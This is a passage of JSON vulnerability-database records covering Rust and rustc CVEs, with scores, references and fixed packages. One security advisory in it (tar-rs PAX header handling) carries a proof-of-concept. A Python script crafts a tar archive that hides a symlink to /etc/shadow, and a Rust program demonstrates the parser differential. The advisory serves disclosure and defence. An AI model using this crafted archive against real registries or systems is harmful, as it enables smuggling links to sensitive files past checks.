"https://api.first.org/data/v1/epss?cve=CVE-2021-31162" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950398", "reference_id": "1950398", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950398" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-31162" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8yv-ngej-1kf7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23202?format=api", "vulnerability_id": "VCID-ehdy-7aak-r3bt", "summary": "tar-rs incorrectly ignores PAX size headers if header size is nonzero\n### Summary\n\nAs part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.\n\nHowever, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.\n\nThe problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.\n\nIn this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.\n\n\n### Details\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n### PoC\n\n(originally posted by https://github.com/xokdvium)\n\n\n> I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:\n\nIt seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n```python\n#!/usr/bin/env python3\nB = 512\n\n\ndef pad(d):\n r = len(d) % B\n return d + b\"\\0\" * (B - r) if r else d\n\n\ndef hdr(name, size, typ=b\"0\", link=b\"\"):\n h = bytearray(B)\n h[0 : len(name)] = name\n h[100:107] = b\"0000644\"\n h[108:115] = h[116:123] = b\"0001000\"\n h[124:135] = f\"{size:011o}\".encode()\n h[136:147] = b\"00000000000\"\n h[148:156] = b\" \"\n h[156:157] = typ\n if link:\n h[157 : 157 + len(link)] = link\n h[257:263] = b\"ustar\\x00\"\n h[263:265] = b\"00\"\n h[148:155] = f\"{sum(h):06o}\\x00\".encode()\n return bytes(h)\n\n\nINFLATED = 2048\npax_rec = b\"13 size=2048\\n\"\n\nar = bytearray()\nar += hdr(b\"./PaxHeaders/regular\", len(pax_rec), typ=b\"x\")\nar += pad(pax_rec)\n\ncontent = b\"regular\\n\"\nar += hdr(b\"regular.txt\", len(content))\nmark = len(ar)\nar += pad(content)\n\nar += hdr(b\"smuggled\", 0, typ=b\"2\", link=b\"/etc/shadow\")\nar += b\"\\0\" * B * 2\n\nused = len(ar) - mark\nif used < INFLATED:\n ar += b\"\\0\" * (((INFLATED - used + B - 1) // B) * B)\nar += b\"\\0\" * B * 2\n\nopen(\"smuggle.tar\", \"wb\").write(bytes(ar))\n```\n\n`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).\n\n```rust\nuse std::fs;\nuse std::path::PathBuf;\n\nfn sync_parse(data: &[u8]) {\n println!(\"tar:\");\n let mut ar = tar::Archive::new(data);\n for e in ar.entries().unwrap() {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\nasync fn async_parse(data: Vec<u8>) {\n println!(\"astral-tokio-tar:\");\n let mut ar = tokio_tar::Archive::new(data.as_slice());\n let mut entries = ar.entries().unwrap();\n while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\n#[tokio::main]\nasync fn main() {\n let path = std::env::args().nth(1).unwrap_or(\"smuggle.tar\".into());\n let data = fs::read(&path).unwrap();\n sync_parse(&data);\n async_parse(data).await;\n}\n```\n\n```\ntar:\n regular.txt Regular\n smuggled Symlink -> /etc/shadow\n\nastral-tokio-tar:\n regular.txt Regular\n```\n\n### Impact\n\nThis can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01418", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01406", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01412", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01417", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01396", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01404", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01409", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01403", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01893", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01847", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01851", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01861", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33055" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055" }, { "reference_url": "https://github.com/alexcrichton/tar-rs", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/alexcrichton/tar-rs" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055" }, { "reference_url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html" }, { "reference_url": "https://www.cve.org/CVERecord?id=CVE-2025-62518", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://www.cve.org/CVERecord?id=CVE-2025-62518" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480", "reference_id": "1131480", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225", "reference_id": "1135225", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225" }, { "reference_url": "https://github.com/advisories/GHSA-gchp-q4r4-x4ff", "reference_id": "GHSA-gchp-q4r4-x4ff", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gchp-q4r4-x4ff" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1056288?format=api", "purl": "pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9" }, { "url": "http://public2.vulnerablecode.io/api/packages/1056290?format=api", "purl": "pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2" } ], "aliases": [ "CVE-2026-33055", "GHSA-gchp-q4r4-x4ff" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ehdy-7aak-r3bt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31473?format=api", "vulnerability_id": "VCID-f4bw-5erp-4uc6", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-29922", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.5542", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55497", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55505", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55522", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55531", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55557", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55533", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55585", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55587", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55596", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55576", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55558", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55595", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55598", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00325", "scoring_system": "epss", "scoring_elements": "0.55577", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-29922" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991962", "reference_id": "1991962", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991962" }, { "reference_url": "https://security.archlinux.org/AVG-2263", "reference_id": "AVG-2263", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-2263" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4270", "reference_id": "RHSA-2021:4270", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4270" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-29922" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f4bw-5erp-4uc6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31470?format=api", "vulnerability_id": "VCID-fu46-5dhv-ckdt", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28877", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50792", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5083", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50862", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5087", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50847", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50873", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50831", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50888", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50886", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50928", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50907", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5089", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50934", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50914", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28877" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949204", "reference_id": "1949204", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949204" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1802", "reference_id": "AVG-1802", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1802" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-28877" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fu46-5dhv-ckdt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31479?format=api", "vulnerability_id": "VCID-j9kg-rd4y-y7by", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-21658", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.7552", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.7555", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75582", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75589", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75608", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75583", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.75572", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00893", "scoring_system": "epss", "scoring_elements": "0.7553", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75793", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75817", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75778", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75789", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75834", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00906", "scoring_system": "epss", "scoring_elements": "0.75823", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-21658" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2041504", "reference_id": "2041504", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2041504" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946", "reference_id": "32ed6e599bb4722efefd78bbc9cd7ec4613cb946", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf", "reference_id": "406cc071d6cfdfdb678bf3d83d766851de95abaf", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf" }, { "reference_url": "https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714", "reference_id": "4f0ad1c92ca08da6e8dc17838070975762f59714", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714" }, { "reference_url": 